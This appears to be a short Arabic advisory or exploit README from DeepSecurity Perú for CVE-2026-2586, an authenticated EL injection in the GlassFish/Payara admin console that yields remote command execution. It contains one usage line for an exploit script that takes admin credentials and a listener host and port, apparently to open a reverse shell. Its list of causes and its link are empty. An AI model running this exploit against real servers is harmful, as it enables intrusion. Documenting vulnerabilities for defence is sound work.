
استغلال حقن EL مصادق عليه لوحدة تحكم إدارة GlassFish/Payara يتيح تنفيذ أوامر عن بُعد عبر معلمات مصممة في تدفق تكوين الخادم الافتراضي.
تتيح ثغرة حقن لغة التعبيرات (Expression Language Injection) في وحدة تحكم إدارة GlassFish لمستخدم مصدَّق حقن تعبيرات EL خبيثة في المعاملات التي تعالجها واجهة الويب الإدارية. وقد يؤدي الاستغلال الناجح إلى تنفيذ أوامر عن بُعد على الخادم المتأثر.
تم تحديد الثغرة في مسار تحرير التكوين الافتراضي للخادم، حيث يتم تفسير المعاملات التي يتحكم فيها المستخدم بشكل غير آمن من قِبل التطبيق.
يحدث ذلك للأسباب التالية:
تم إجراء الاختبار في بيئة محلية وخاضعة للتحكم.
CVE-2026-2586.py --url https://glassfish:4848/ --user <USERNAME> --password <PASSWORD> --lhost 127.0.0.1 --lport 4444 --insecure
الرابط القابل للاستغلال:
للاستخدام المصرَّح به فقط. لا تؤيد شركة DeepSecurity Perú الوصول غير المصرَّح به، ولا تتحمل أي مسؤولية عن أي إساءة استخدام للمعلومات المقدَّمة.